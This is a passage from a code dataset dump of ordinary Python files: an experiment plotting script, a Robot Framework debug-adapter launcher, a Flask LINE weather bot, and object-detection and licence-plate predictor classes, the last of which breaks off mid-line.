70, "usage_type": "call"}]} +{"seq_id": "354237828", "text": "#! python3\n\n##\n# Plot the experimental results of the buckets overflows\n# The script takes a mandatory argument: the input file\n# You can also specify the label to use when plotting by using the -l (or\n# --label) option. 
The acceptable values are \"m\", \"n\", \"n/m\", \"max_len\" and\n# \"algorithm\"\n\nimport argparse\nimport matplotlib.pyplot as plt\nimport json\nimport math\n\n\ndef plot_file(filename, label):\n cmap = plt.get_cmap('jet')\n N = 20\n\n fig, (ax1) = plt.subplots(nrows=1, ncols=1)\n # fig = plt.figure()\n # ax1 = fig.add_subplot(211)\n # ax2 = fig.add_subplot(212)\n\n with open(filename) as souce:\n data = json.load(souce)\n exp_num = 10\n for experiment in data: # iterate over the experiments\n stat_min = []\n stat_max = []\n stat_mean = []\n stat_std_dev = []\n count = 0\n # iterate over the different modes\n for mode in experiment[\"load_modes\"]:\n # if (overflow_stat[1] == 0):\n # break\n count = count+1\n stat_min.append(mode[0])\n stat_max.append(mode[1])\n stat_mean.append(mode[2])\n stat_std_dev.append(math.sqrt(mode[3]))\n\n color = cmap(float(exp_num)/N)\n # plt.plot(stat_min, dashes=[6, 2], color=color)\n l = \"\"\n if label == \"n/m\":\n l = str(float(experiment[\"parameters\"][\"n\"]) /\n float(experiment[\"parameters\"][\"m\"]))\n else:\n l = experiment[\"parameters\"][label]\n ax1.plot(range(0, count), stat_mean,\n label=l, color=color, marker=\"x\")\n exp_num = exp_num + 1\n\n # ax1.semilogy()\n # ax2.semilogy()\n # plt.xlabel('alpha')\n\n # plt.subplot(211)\n # plt.semilogy()\n # # plt.xlabel('alpha')\n # plt.ylabel('# overflowing entries')\n # # plt.legend()\n # plt.subplot(212)\n # plt.semilogy()\n # plt.xlabel('alpha')\n # ax1.set_ylabel('Max # overflows')\n # ax2.set_ylabel('Average # overflows')\n # ax3.set_ylabel('Max # overflows')\n # ax4.set_ylabel('Average # overflows')\n plt.legend()\n\n plt.show()\n\n\nparser = argparse.ArgumentParser(description='Plot allocation overflows.')\nparser.add_argument('filename', metavar='path',\n help='Path to a JSON file')\nparser.add_argument('--label', '-l', default='n',\n help='Define the used label')\n\nargs = parser.parse_args()\n# print(args)\n\n# filename = \"../experiments/var_n_m/large_m_res.json\"\n# filename = \"../experiments/var_max_len/one_choice_res.json\"\n\nplot_file(args.filename, args.label)\n", "sub_path": "python/plot_modes.py", "file_name": "plot_modes.py", "file_ext": "py", "file_size_in_byte": 2682, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.pyplot.get_cmap", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "297553067", "text": "import sys\nimport socket as socket_module\nfrom os.path import os\nimport threading\nimport json\n\ntry:\n import queue\nexcept ImportError:\n import Queue as queue\n\n__file__ = os.path.abspath(__file__)\nif __file__.endswith((\".pyc\", \".pyo\")):\n __file__ = __file__[:-1]\n\nLOG_FORMAT = \"ROBOT: %(asctime)s UTC pid: 
%(process)d - %(threadName)s - %(levelname)s - %(name)s\\n%(message)s\\n\\n\"\n\n\ndef connect(port):\n from robotframework_ls.options import DEFAULT_TIMEOUT\n from robotframework_ls.impl.robot_lsp_constants import ENV_OPTION_ROBOT_DAP_TIMEOUT\n from robotframework_ls.robotframework_log import get_logger\n\n log = get_logger(\"robotframework_debug_adapter.run_robot__main__.py\")\n\n # Set TCP keepalive on an open socket.\n # It activates after 1 second (TCP_KEEPIDLE,) of idleness,\n # then sends a keepalive ping once every 3 seconds (TCP_KEEPINTVL),\n # and closes the connection after 5 failed ping (TCP_KEEPCNT), or 15 seconds\n s = socket_module.socket(socket_module.AF_INET, socket_module.SOCK_STREAM)\n try:\n IPPROTO_TCP, SO_KEEPALIVE, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT = (\n socket_module.IPPROTO_TCP,\n socket_module.SO_KEEPALIVE,\n socket_module.TCP_KEEPIDLE, # @UndefinedVariable\n socket_module.TCP_KEEPINTVL, # @UndefinedVariable\n socket_module.TCP_KEEPCNT, # @UndefinedVariable\n )\n s.setsockopt(socket_module.SOL_SOCKET, SO_KEEPALIVE, 1)\n s.setsockopt(IPPROTO_TCP, TCP_KEEPIDLE, 1)\n s.setsockopt(IPPROTO_TCP, TCP_KEEPINTVL, 3)\n s.setsockopt(IPPROTO_TCP, TCP_KEEPCNT, 5)\n except AttributeError:\n pass # May not be available everywhere.\n\n try:\n # 10 seconds default timeout\n timeout = int(os.environ.get(ENV_OPTION_ROBOT_DAP_TIMEOUT, DEFAULT_TIMEOUT))\n s.settimeout(timeout)\n s.connect((\"127.0.0.1\", port))\n s.settimeout(None) # no timeout after connected\n log.info(\"Connected.\")\n return s\n except:\n log.exception(\"Could not connect to: %s\", (port,))\n raise\n\n\nclass _DAPCommandProcessor(threading.Thread):\n def __init__(self, s):\n threading.Thread.__init__(self)\n self.daemon = True\n self._socket = s\n self._write_queue = queue.Queue()\n self.configuration_done = threading.Event()\n self.terminated = threading.Event()\n\n def start_communication_threads(self):\n from robotframework_debug_adapter.debug_adapter_threads import writer_thread\n from robotframework_debug_adapter.debug_adapter_threads import reader_thread\n\n read_from = self._socket.makefile(\"rb\")\n write_to = self._socket.makefile(\"wb\")\n\n writer = self._writer_thread = threading.Thread(\n target=writer_thread, args=(write_to, self._write_queue, \"write to dap\")\n )\n writer.setDaemon(True)\n\n reader = self._reader_thread = threading.Thread(\n target=reader_thread,\n args=(read_from, self.process_message, self._write_queue, b\"read from dap\"),\n )\n reader.setDaemon(True)\n\n reader.start()\n writer.start()\n\n def terminate(self):\n from robotframework_debug_adapter.dap.dap_schema import TerminatedEvent\n from robotframework_debug_adapter.dap.dap_schema import TerminatedEventBody\n\n self.write_message(TerminatedEvent(TerminatedEventBody()))\n\n def write_message(self, msg):\n self._write_queue.put(msg)\n\n def process_message(self, protocol_message):\n from robotframework_ls.robotframework_log import get_logger\n from robotframework_debug_adapter.constants import DEBUG\n from robotframework_debug_adapter.debug_adapter_threads import (\n READER_THREAD_STOPPED,\n )\n\n log = get_logger(\"robotframework_debug_adapter.run_robot__main__.py\")\n if protocol_message is READER_THREAD_STOPPED:\n if DEBUG:\n log.debug(\"_DAPCommandProcessor: READER_THREAD_STOPPED.\")\n return\n\n if DEBUG:\n log.debug(\n \"Process json: %s\\n\"\n % (json.dumps(protocol_message.to_dict(), indent=4, sort_keys=True),)\n )\n\n try:\n if protocol_message.type == \"request\":\n method_name = \"on_%s_request\" % 
(protocol_message.command,)\n\n elif protocol_message.type == \"event\":\n method_name = \"on_%s_event\" % (protocol_message.event,)\n\n else:\n if DEBUG:\n log.debug(\n \"Unable to decide how to deal with protocol type: %s in _DAPCommandProcessor.\\n\"\n % (protocol_message.type,)\n )\n return\n\n on_request = getattr(self, method_name, None)\n if on_request is not None:\n on_request(protocol_message)\n else:\n if DEBUG:\n log.debug(\n \"Unhandled: %s not available in CommandProcessor.\\n\"\n % (method_name,)\n )\n except:\n log.exception(\"Error\")\n\n def on_terminated_event(self, event):\n self.terminated.set()\n\n def on_initialize_request(self, request):\n \"\"\"\n :param InitializeRequest request:\n \"\"\"\n from robotframework_debug_adapter.dap.dap_base_schema import build_response\n from robotframework_debug_adapter.dap.dap_schema import InitializedEvent\n from robotframework_debug_adapter.dap.dap_schema import ProcessEvent\n from robotframework_debug_adapter.dap.dap_schema import ProcessEventBody\n\n # : :type initialize_response: InitializeResponse\n # : :type capabilities: Capabilities\n self._initialize_request_arguments = request.arguments\n initialize_response = build_response(request)\n capabilities = initialize_response.body\n capabilities.supportsConfigurationDoneRequest = True\n self.write_message(initialize_response)\n self.write_message(\n ProcessEvent(ProcessEventBody(sys.executable, systemProcessId=os.getpid()))\n )\n self.write_message(InitializedEvent())\n\n def on_configurationDone_request(self, request):\n \"\"\"\n :param ConfigurationDoneRequest request:\n \"\"\"\n from robotframework_debug_adapter.dap.dap_base_schema import build_response\n\n response = build_response(request)\n self.write_message(response)\n self.configuration_done.set()\n\n\ndef main():\n try:\n import robotframework_ls\n except ImportError:\n # Automatically add it to the path if __main__ is being executed.\n sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n import robotframework_ls # @UnusedImport\n\n from robotframework_ls.robotframework_log import (\n configure_logger,\n log_args_and_python,\n )\n from robotframework_ls.robotframework_log import get_logger\n\n configure_logger(\"robot\")\n log = get_logger(\"robotframework_debug_adapter.run_robot__main__.py\")\n log_args_and_python(log, sys.argv)\n\n from robotframework_ls.options import DEFAULT_TIMEOUT\n\n args = sys.argv[1:]\n assert args[0] == \"--port\"\n port = args[1]\n\n robot_args = args[2:]\n\n s = connect(int(port))\n processor = _DAPCommandProcessor(s)\n processor.start_communication_threads()\n if not processor.configuration_done.wait(DEFAULT_TIMEOUT):\n sys.stderr.write(\n \"Process not configured for launch in the available timeout.\\n\"\n )\n sys.exit(1)\n\n try:\n from robot import run_cli\n\n exitcode = run_cli(robot_args, exit=False)\n finally:\n processor.terminate()\n if processor.terminated.wait(2):\n log.debug(\"Processed dap terminate event in robot.\")\n sys.exit(exitcode)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "src/robotframework_debug_adapter/run_robot__main__.py", "file_name": "run_robot__main__.py", "file_ext": "py", "file_size_in_byte": 7939, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.os", "line_number": 12, 
"usage_type": "name"}, {"api_name": "robotframework_ls.robotframework_log.get_logger", "line_number": 24, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 30, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 30, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 30, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 33, "usage_type": "attribute"}, {"api_name": "socket.SO_KEEPALIVE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPIDLE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPINTVL", "line_number": 36, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPCNT", "line_number": 37, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.os.environ.get", "line_number": 48, "usage_type": "call"}, {"api_name": "robotframework_ls.impl.robot_lsp_constants.ENV_OPTION_ROBOT_DAP_TIMEOUT", "line_number": 48, "usage_type": "argument"}, {"api_name": "robotframework_ls.options.DEFAULT_TIMEOUT", "line_number": 48, "usage_type": "argument"}, {"api_name": "os.path.os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.os", "line_number": 48, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 59, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 61, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 61, "usage_type": "attribute"}, {"api_name": "Queue.Queue", "line_number": 64, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 65, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 66, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 75, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.debug_adapter_threads.writer_thread", "line_number": 76, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 80, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.debug_adapter_threads.reader_thread", "line_number": 81, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.TerminatedEvent", "line_number": 93, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.TerminatedEventBody", "line_number": 93, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.get_logger", "line_number": 105, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.debug_adapter_threads.READER_THREAD_STOPPED", "line_number": 106, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 107, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 111, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 114, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 125, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.constants.DEBUG", "line_number": 136, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.dap.dap_base_schema.build_response", "line_number": 159, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.ProcessEvent", "line_number": 164, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.ProcessEventBody", "line_number": 164, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 
164, "usage_type": "attribute"}, {"api_name": "os.path.os.getpid", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.os", "line_number": 164, "usage_type": "name"}, {"api_name": "robotframework_debug_adapter.dap.dap_schema.InitializedEvent", "line_number": 166, "usage_type": "call"}, {"api_name": "robotframework_debug_adapter.dap.dap_base_schema.build_response", "line_number": 174, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 184, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.path.os.path.dirname", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.os.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.path.os", "line_number": 184, "usage_type": "name"}, {"api_name": "os.path.os.path.abspath", "line_number": 184, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.configure_logger", "line_number": 193, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.get_logger", "line_number": 194, "usage_type": "call"}, {"api_name": "robotframework_ls.robotframework_log.log_args_and_python", "line_number": 195, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 195, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 199, "usage_type": "attribute"}, {"api_name": "{'writer_thread': 'robotframework_debug_adapter.debug_adapter_threads.writer_thread', 'reader_thread': 'robotframework_debug_adapter.debug_adapter_threads.reader_thread', 'TerminatedEvent': 'robotframework_debug_adapter.dap.dap_schema.TerminatedEvent', 'TerminatedEventBody': 'robotframework_debug_adapter.dap.dap_schema.TerminatedEventBody', 'get_logger': 'robotframework_ls.robotframework_log.get_logger', 'DEBUG': 'robotframework_debug_adapter.constants.DEBUG', 'READER_THREAD_STOPPED': 'robotframework_debug_adapter.debug_adapter_threads.READER_THREAD_STOPPED', 'build_response': 'robotframework_debug_adapter.dap.dap_base_schema.build_response', 'InitializedEvent': 'robotframework_debug_adapter.dap.dap_schema.InitializedEvent', 'ProcessEvent': 'robotframework_debug_adapter.dap.dap_schema.ProcessEvent', 'ProcessEventBody': 'robotframework_debug_adapter.dap.dap_schema.ProcessEventBody'}", "line_number": 206, "usage_type": "call"}, {"api_name": "robotframework_ls.options.DEFAULT_TIMEOUT", "line_number": 208, "usage_type": "argument"}, {"api_name": "sys.stderr.write", "line_number": 209, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 209, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 212, "usage_type": "call"}, {"api_name": "robot.run_cli", "line_number": 217, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 222, "usage_type": "call"}]} +{"seq_id": "431486978", "text": "from flask import Flask, request, abort, jsonify\nfrom weather import Weather\nfrom places import Places\nimport os\nimport sys\nimport json\nimport errno\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\n\nfrom linebot.exceptions import (\n LineBotApiError, InvalidSignatureError\n)\n\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n SourceUser, SourceGroup, SourceRoom,\n TemplateSendMessage, ConfirmTemplate, MessageAction,\n ButtonsTemplate, ImageCarouselTemplate, ImageCarouselColumn, URIAction,\n PostbackAction, DatetimePickerAction,\n CarouselTemplate, CarouselColumn, PostbackEvent,\n StickerMessage, StickerSendMessage, LocationMessage, LocationSendMessage,\n ImageMessage, 
VideoMessage, AudioMessage, FileMessage,\n UnfollowEvent, FollowEvent, JoinEvent, LeaveEvent, BeaconEvent,\n FlexSendMessage, BubbleContainer, ImageComponent, BoxComponent,\n TextComponent, SpacerComponent, IconComponent, ButtonComponent,\n SeparatorComponent, CarouselContainer, QuickReply, QuickReplyButton, LocationAction, CameraAction,\n CameraRollAction\n)\n\napp = Flask(__name__)\nweather = Weather()\nplaces = Places()\nchannel_secret = os.getenv('LINE_CHANNEL_SECRET', None)\nchannel_access_token = os.getenv('LINE_CHANNEL_ACCESS_TOKEN', None)\n\nif channel_secret is None:\n print('Specify LINE_CHANNEL_SECRET as environment variable.')\n sys.exit(1)\nif channel_access_token is None:\n print('Specify LINE_CHANNEL_ACCESS_TOKEN as environment variable.')\n sys.exit(1)\nstatic_tmp_path = os.path.join(os.path.dirname(__file__), 'static', 'tmp')\n\nline_bot_api = LineBotApi(channel_access_token)\nhandler = WebhookHandler(channel_secret)\n\n\ndef make_static_tmp_dir():\n try:\n print(\"Create Static Dir: \" + static_tmp_path)\n os.makedirs(static_tmp_path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(static_tmp_path):\n pass\n else:\n raise\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except LineBotApiError as e:\n print(\"Got exception from LINE Messaging API: %s\\n\" % e.message)\n for m in e.error.details:\n print(\" %s: %s\" % (m.property, m.message))\n print(\"\\n\")\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n\n@app.route(\"/\", methods=['GET'])\ndef health_check():\n return jsonify(\n {\n 'status': 'UP'\n }\n )\n\n\n@handler.add(MessageEvent, message=LocationMessage)\ndef handle_location_message(event):\n weather_data = weather.get_weather_forecast(event.message.latitude, event.message.longitude)\n bubble_container = weather.get_weather_message(weather_data)\n messages = []\n messages.append(FlexSendMessage(alt_text=\"Weather Forecast\", contents=bubble_container))\n line_bot_api.reply_message(event.reply_token, messages=messages)\n\n\n@handler.add(PostbackEvent)\ndef handle_postback_event(event):\n data = event.postback.data\n print('postback data:{}'.format(data))\n if 'place_search?' 
in data:\n query_params = data.split('?')[1]\n lat = float(query_params.split('&')[0].split('=')[1])\n lng = float(query_params.split('&')[1].split('=')[1])\n type = query_params.split('&')[2].split('=')[1]\n if type == 'all':\n places_data = places.get_nearby_places(lat, lng)\n else:\n places_data = places.get_nearby_places(lat, lng, type)\n messages = []\n if isinstance(places_data, str):\n messages.append(TextSendMessage(text=places_data))\n line_bot_api.reply_message(event.reply_token, messages=messages)\n else:\n messages.append(FlexSendMessage(alt_text='Places', contents=places_data))\n line_bot_api.reply_message(event.reply_token, messages)\n\n if 'weather=' in data:\n weather_data = weather.get_weather_by_place(data.split(\"=\")[1])\n bubble_container = weather.get_weather_message(weather_data)\n line_bot_api.reply_message(event.reply_token, FlexSendMessage(alt_text=\"Weather Forecast\",\n contents=bubble_container))\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_text_message(event):\n text = event.message.text\n\n if 'อากาศ' == text or 'weather' == text.lower():\n quick_reply = QuickReply(\n items=[\n QuickReplyButton(\n action=LocationAction(label='Send Location')\n ),\n QuickReplyButton(\n action=PostbackAction(label='Tokyo Weather', data='weather=tokyo', display_text='Tokyo Weather')\n ),\n QuickReplyButton(\n action=PostbackAction(label='Seoul Weather', data='weather=seoul', display_text='Seoul Weather')\n ),\n QuickReplyButton(\n action=PostbackAction(label='London Weather', data='weather=london',\n display_text='London Weather')\n )\n ]\n )\n reply_message = TextSendMessage(text=\"Let me know your location or place\",\n quick_reply=quick_reply)\n line_bot_api.reply_message(event.reply_token, messages=reply_message)\n\n if 'weather in ' in text.lower():\n weather_data = weather.get_weather_by_place(text.split(\" \")[2])\n if isinstance(weather_data, str):\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=weather_data))\n else:\n bubble_container = weather.get_weather_message(weather_data)\n line_bot_api.reply_message(event.reply_token, FlexSendMessage(alt_text=\"Weather Forecast\",\n contents=bubble_container))\n\n\nmake_static_tmp_dir()\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6224, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 32, "usage_type": "call"}, {"api_name": "weather.Weather", "line_number": 33, "usage_type": "call"}, {"api_name": "places.Places", "line_number": 34, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 35, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 44, "usage_type": "call"}, {"api_name": "linebot.LineBotApi", "line_number": 46, "usage_type": "call"}, {"api_name": "linebot.WebhookHandler", "line_number": 47, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 53, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 55, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request.headers", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "linebot.exceptions.LineBotApiError", "line_number": 73, "usage_type": "name"}, {"api_name": "linebot.exceptions.InvalidSignatureError", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 86, "usage_type": "call"}, {"api_name": "weather.get_weather_forecast", "line_number": 95, "usage_type": "call"}, {"api_name": "weather.get_weather_message", "line_number": 96, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 98, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 93, "usage_type": "argument"}, {"api_name": "linebot.models.LocationMessage", "line_number": 93, "usage_type": "name"}, {"api_name": "places.get_nearby_places", "line_number": 112, "usage_type": "call"}, {"api_name": "places.get_nearby_places", "line_number": 114, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 117, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 120, "usage_type": "call"}, {"api_name": "weather.get_weather_by_place", "line_number": 124, "usage_type": "call"}, {"api_name": "weather.get_weather_message", "line_number": 125, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 126, "usage_type": "call"}, {"api_name": "linebot.models.PostbackEvent", "line_number": 102, "usage_type": "argument"}, {"api_name": "linebot.models.QuickReply", "line_number": 135, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 137, "usage_type": "call"}, {"api_name": "linebot.models.LocationAction", "line_number": 138, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 140, "usage_type": "call"}, {"api_name": "linebot.models.PostbackAction", "line_number": 141, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 143, "usage_type": "call"}, {"api_name": "linebot.models.PostbackAction", "line_number": 144, "usage_type": "call"}, {"api_name": "linebot.models.QuickReplyButton", "line_number": 146, "usage_type": "call"}, {"api_name": "linebot.models.PostbackAction", "line_number": 147, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 152, "usage_type": "call"}, {"api_name": "weather.get_weather_by_place", "line_number": 157, "usage_type": "call"}, {"api_name": "linebot.models.TextSendMessage", "line_number": 159, "usage_type": "call"}, {"api_name": "weather.get_weather_message", "line_number": 161, "usage_type": "call"}, {"api_name": "linebot.models.FlexSendMessage", "line_number": 162, "usage_type": "call"}, {"api_name": "linebot.models.MessageEvent", "line_number": 130, "usage_type": "argument"}, {"api_name": "linebot.models.TextMessage", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "427496841", "text": "import tensorflow as tf\nfrom keras import backend as K\nfrom keras.models import load_model\nimport numpy as np\nimport sys\nfrom queue import Queue\nfrom threading import Thread\n\nfrom 
keras_loss_function.keras_ssd_loss import SSDLoss\nfrom keras_layers.keras_layer_AnchorBoxes import AnchorBoxes\nfrom ssd_encoder_decoder.ssd_output_decoder import decode_detections, decode_detections_fast\nimport cv2\nimport subprocess\nfrom utils.generic import getWithDefault,getMillis\n\nclass SSD7Predictor:\n def __init__ (\n self,\n name,\n model,\n inQ,\n outQ,\n img_height = 300,\n img_width = 480,\n normalize_coords = True,\n class_threshold=None,\n confidence_thresh=0.15, #0.25,\n iou_threshold= 0.05, #0.15, #0.45,\n top_k=10\n ):\n\n self.name = name\n self.model = model\n self.inQ = inQ\n self.outQ = outQ\n self.img_height = img_height\n self.img_width = img_width\n self.normalize_coords = normalize_coords\n\n self.class_threshold=class_threshold\n self.confidence_thresh=confidence_thresh\n self.iou_threshold=iou_threshold\n self.top_k=top_k\n self.thr = None\n self.running = False\n self.state = \"stopped\"\n\n\n def _fix_decoded(self,y_pred_decoded):\n if self.class_threshold == None:\n return y_pred_decoded\n else:\n result = []\n for box in y_pred_decoded:\n clase = box[0]\n confidence = box[1]\n threshold = self.class_threshold[str(clase)]\n if confidence>=threshold:\n result.append(box)\n return result\n\n def preProccessing(self,frm):\n self.realHeight,self.realWidth = frm.shape[:2]\n img = cv2.resize(frm,(self.img_width,self.img_height))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n batch_images = np.expand_dims(img,axis=0)\n return batch_images\n\n def postProccessing(self,y_pred):\n y_pred_decoded = decode_detections(\n y_pred,\n confidence_thresh=self.confidence_thresh, #0.25,\n iou_threshold= self.iou_threshold, #0.15, #0.45,\n top_k=self.top_k, #200,\n normalize_coords=self.normalize_coords,\n img_height=self.realHeight,\n img_width=self.realWidth\n )\n y_pred_decoded = y_pred_decoded[0]\n if y_pred_decoded.shape != (0,):\n y_pred_decoded[:,1] *= 100\n y_pred_decoded = y_pred_decoded.astype(int)\n y_pred_fixed = self._fix_decoded(y_pred_decoded)\n else:\n y_pred_fixed = y_pred_decoded\n return y_pred_fixed\n\n def predict(self,camera,frm):\n batch_images = self.preProccessing(frm)\n with K.get_session().as_default():\n with tf.get_default_graph().as_default():\n y_pred = self.model.getModel().predict(batch_images)\n return self.postProccessing(y_pred)\n\n def start(self):\n print(\"starting \"+ self.name)\n if not self.running and self.thr==None:\n print(\"creating thread\")\n self.thr = Thread(name=self.name+\".helper\",target=self._run, args=())\n self.thr.daemon = True\n self.running = True\n self.thr.start()\n print(\"thread created\")\n return self\n\n def stop(self):\n if self.running:\n self.running = False\n self.thr.join(1)\n return self\n\n def _run(self):\n while self.running:\n camera,frm = self.inQ.get()\n result = self.predict(camera,frm)\n self.outQ.put((self.name,camera,{\"objects\":result},frm,True))\n\n self.outQ.put((self.name,None,None,None,False))\n self.running = False\n self.thr = None\n return self\n\n def status(self):\n if not self.running and self.thr==None:\n return \"stopped\"\n elif not self.running:\n return \"stopping\"\n else:\n return \"running\"\n\n\nclass ALPRPredictor:\n def __init__ (self,name,clipsPath,inQ,outQ):\n self.name = name\n self.clipsPath = clipsPath\n self.inQ = inQ\n self.outQ = outQ\n self.thr = None\n self.running = False\n self.state = \"stopped\"\n self.state = {}\n\n\n def predict(self,camera,frm):\n batch_images = self.preProccessing(frm)\n with K.get_session().as_default():\n with tf.get_default_graph().as_default():\n y_pred = self.model.getModel().predict(batch_images)\n return self.postProccessing(y_pred)\n\n def start(self):\n print(\"starting ...\"+ self.name)\n if not self.running and self.thr==None:\n print(\"creating thread\")\n self.thr = Thread(name=self.name+\".helper\",target=self._run, args=())\n self.thr.daemon = True\n self.running = True\n self.thr.start()\n print(\"started \" + self.name)\n return self\n\n def stop(self):\n if self.running:\n self.running = False\n self.thr.join(1)\n return self\n\n def _run(self):\n while self.running:\n predecesor,cam,result,frm,ok = self.inQ.get()\n camState = getWithDefault(self.state,cam,{\"plates\":[],\"plate\":\"unknown\"})\n self.state[cam]=camState\n print(\"ALPR state: {}\".format(self.state[cam]))\n if ok:\n trailer_present = False\n for pred in result[\"objects\"]:\n if pred[0] == 2:\n trailer_present = True\n if pred[0] == 5 and self.state[cam][\"plate\"] == \"unknown\":\n xmin = pred[2]\n ymin = pred[3]\n xmax = pred[4]\n ymax = pred[5]\n clipName = self.clipsPath + \"/{}.jpg\"\n clipName = 